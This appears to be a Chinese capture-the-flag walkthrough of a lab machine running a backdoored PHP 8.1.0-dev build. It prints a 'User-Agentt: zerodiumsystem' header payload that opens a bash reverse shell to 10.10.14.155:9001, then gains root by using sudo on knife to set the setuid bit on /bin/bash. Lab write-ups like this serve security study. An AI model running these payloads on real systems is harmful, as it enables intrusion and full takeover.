主机信息
服务枚举
nmap -sC -sV 10.10.10.242
看到对应主机开放了80端口,我们上去访问了一下页面
看了下页面的功能和源码,也没发现什么突破点。扫了下目录,也没有发现啥信息
抓包分析
因为没有思路了,我使用burpsuite进行抓包调试时,发现了X-Powered-By
的对应值为PHP/8.1.0-dev
。在网上搜索到对应的资料显示PHP/8.1.0-dev存在一个开发后门,加入User-Agentt
字段并添加zerodium函数名作为对应值,就能实现RCE漏洞。
我们在User-Agentt字段中添加zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.155/9001 0>&1'")
这个值
至此我们获取到了一个普通账户的权限,得到第一个flag值
然后就是我们的提权重头戏了,首先我们先看看sudo -l
大概的信息。这里的意思是knife用户可以使用root身份来运行/usr/bin/knife
这条命令
因此我们将要执行的恶意代码写入exploit.rb
文件中。echo "system('chmod +s /bin/bash')">exploit.rb
chmod的+s选项是在文件执行时把进程的属主或组ID置为该文件的文件属主。执行这个文件将权限提升为root权限
查看到最后的root的flag值